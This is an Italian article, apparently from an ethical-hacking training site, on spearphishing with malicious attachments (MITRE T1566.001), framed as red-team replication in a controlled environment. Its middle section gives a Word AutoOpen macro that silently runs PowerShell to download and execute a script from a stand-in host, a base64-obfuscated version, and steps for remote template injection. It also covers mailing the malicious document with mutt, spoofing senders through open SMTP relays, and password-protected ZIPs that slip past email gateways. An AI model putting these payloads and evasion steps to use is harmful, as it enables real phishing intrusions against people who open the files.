Spearphishing con Allegati: Phishing con Allegati Malevoli (T1566.001)

Il phishing con allegati malevoli rappresenta una tecnica di compromissione iniziale che sfrutta la fiducia umana attraverso email apparentemente legittime. Gli attaccanti inviano messaggi mirati contenenti file dannosi mascherati da documenti ordinari, sfruttando l'ingegneria sociale per indurre le vittime ad aprirli.

Questa tecnica appartiene esclusivamente alla tattica TA0001 (Initial Access), posizionandosi nella fase iniziale della kill chain quando l'attaccante cerca di stabilire il primo punto d'appoggio nella rete target. La sua efficacia è dimostrata da numeri impressionanti: 77 gruppi APT documentati, 55 famiglie di malware distribuite attraverso questa metodologia e 9 campagne di alto profilo che l'hanno utilizzata come vettore primario.

I formati di file più comuni includono documenti Microsoft Office con macro, PDF weaponizzati, archivi compressi protetti da password e file eseguibili camuffati. L'evoluzione di questa tecnica ha visto l'introduzione di meccanismi sempre più sofisticati per eludere i controlli di sicurezza, come l'uso di archivi multipli annidati o tecniche di template injection remote.

Per replicare efficacemente questa tecnica in ambiente controllato, inizia creando un documento Word con macro malevola. Apri Visual Basic Editor in Word e inserisci questo codice nella sezione ThisDocument:

Sub AutoOpen() Shell "powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.local/payload.ps1')" End Sub

Il payload PowerShell può essere ospitato su un server web controllato. Per mascherare meglio l'attacco, incorpora il comando in una catena più complessa che include offuscamento base64:

$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('IEX(New-Object Net.WebClient).DownloadString("http://attacker.local/p.ps1")')) powershell.exe -enc $encoded

Per testare la tecnica del template injection remoto, crea un documento DOCX e modifica il file document.xml.rels all'interno dell'archivio ZIP. Sostituisci il target relationship con un URL remoto che punta al tuo template malevolo.

Su Linux, puoi simulare attacchi via attachment utilizzando mutt per l'invio automatizzato: echo "Please review the attached document" | mutt -s "Quarterly Report" -a malicious.doc -- target@victim.local

Per aumentare la credibilità, utilizza tecniche di spoofing del mittente attraverso server SMTP aperti o mal configurati. Strumenti come GoPhish o King Phisher permettono di orchestrare campagne complete con tracking dei click e aperture.

Quando testi archivi protetti da password, ricorda che molti gateway email non riescono ad analizzarli. Crea un ZIP con password "invoice2024" e includila nel corpo dell'email - questa tecnica è stata ampiamente utilizzata da TA551 e APT-C-36.

I red teamer più esperti combinano questa tecnica con payload in memoria per evitare detection. Un approccio efficace prevede l'uso di documenti HTA o CHM che eseguono codice JavaScript offuscato, tecnica documentata nell'uso da parte di APT41.

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo